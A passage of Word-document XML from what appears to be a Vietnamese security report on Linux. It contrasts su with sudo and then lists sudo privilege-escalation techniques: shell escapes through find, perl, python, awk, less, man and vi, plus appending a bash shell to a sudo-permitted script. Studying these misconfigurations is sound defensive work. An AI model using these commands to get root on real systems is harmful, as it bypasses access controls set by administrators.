          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.2.3.2.Phân biệt Su và Sudo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="0186CE90" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:widowControl w:val="0"/>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udo là một cơ chế quản lý quyền, phụ thuộc vào /etc/sudoers, xác định người dùng nào được phép thực hiện loại lệnh quản lý nào. Định dạng lệnh là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAF1BEB" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo -u username command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CEC349"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Theo mặc định, chỉ người dùng root mới có thể thực thi lệnh sudo. Người dùng root cần chỉnh sửa file cấu hình </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo /etc/sudoers</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng cách sử dụng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>vi sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để cho phép những người dùng bình thường khác thực thi lệnh sudo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5226C6B6" w14:textId="29559E75"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Su là viết tắt của switch user. Với su,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ó thể chuyển đổi bất kể user nào, Nói chung là chỉ cần sử dụng su-username và nhập mật khẩu vào là được, nhưng root thì không cần nhập mật khẩu khi chuyển sang danh tính khác với su.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42818A7A" w14:textId="77777777" w:rsidR="00B53014" w:rsidRDefault="001F7EFA" w:rsidP="00B53014">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc90050736"/>
      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.2.3.3. Privilege Escalation using Sudo Rights</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="470CCC8A" w14:textId="3610EDDA" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA" w:rsidP="00B53014">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ây là phương pháp dựa vào config của Sudoers file, từ việc chỉ có thể thực thi sudo với những lệnh hạn chế, chúng ta có thể leo thang đặc quyền để có được quyền Root một cách dễ dàng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510FA46C" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00B53014" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc90050737"/>
      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.2.3.3.1. Khi đặc quyền root được gán cho Binary commands</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="6023985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Đôi khi người dùng có quyền thực thi bất kỳ tệp hoặc lệnh nào của một thư mục cụ thể như </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/bin/cp, /bin/cat hoặc /usr/bin/ find</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50989BB9" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_heading=h.y1dj3wql5t55" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Using Find Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099AD8AF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_heading=h.77lyge1ex6rd" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo find /(thư mục nào đó) -exec /bin/bash \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14776833" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo find /bin -name nano -exec /bin/sh \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E52FF7" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00B53014" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc90050738"/>
      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.2.3.3.2. Khi đặc quyền root được gán cho Binary Programs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="4A6DDC7D" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ như: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>user ALL= (root) NOPASSWD: /usr/bin/perl, /usr/bin/python, /usr/bin/less, /usr/bin/awk, /usr/bin/man, /usr/bin/vi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B0855E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_heading=h.tt8kjmnt4xje" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Using Perl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F95ECF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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lệnh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo perl -e 'exec "/bin/bash";'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB7082F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_heading=h.xatllcuxz88a" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Python </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC1DCE0" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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lệnh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo python -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A434322" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_heading=h.hsg8hsku5ay6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Using Less Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41734D50" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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Câu lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo less /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F69C75B" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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Sau đó gõ !bash và ấn Enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1811F156" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_heading=h.1lfrvdn4bpcp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Using AWK:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/awk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03642CB7" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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lệnh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo awk 'BEGIN {system("/bin/bash")}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35140BFF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_heading=h.m20ajku9q771" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Man Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/usr/bin/man</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1D1339" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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Câu lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo man man</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F774687" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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ương tự với Less comand, thêm !bash, ấn Enter và có root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD97432" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_heading=h.ppocz9aqvp5k" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Using vim:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/vi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4B831E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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lệnh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo vi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF217C0" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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hêm :bash!, ấn enter và có root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B85F25A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00B53014" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc90050739"/>
      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.2.3.3.3. Khi đặc quyền root được gán cho Shell Script</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="2CAF12C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Ví dụ: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>user ALL= (root) NOPASSWD: /home/nghia/root.sh, /home/nghia/root.py, /home/nghia/shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536F4875" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_heading=h.dylxoht8f61h" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Executing Bash script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3BA23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lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCC1A62" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo "/bin/bash -i" &gt;&gt; filename.sh(nếu trong script chưa có sẵn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1D172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sudo ./filename.s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E7FDF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
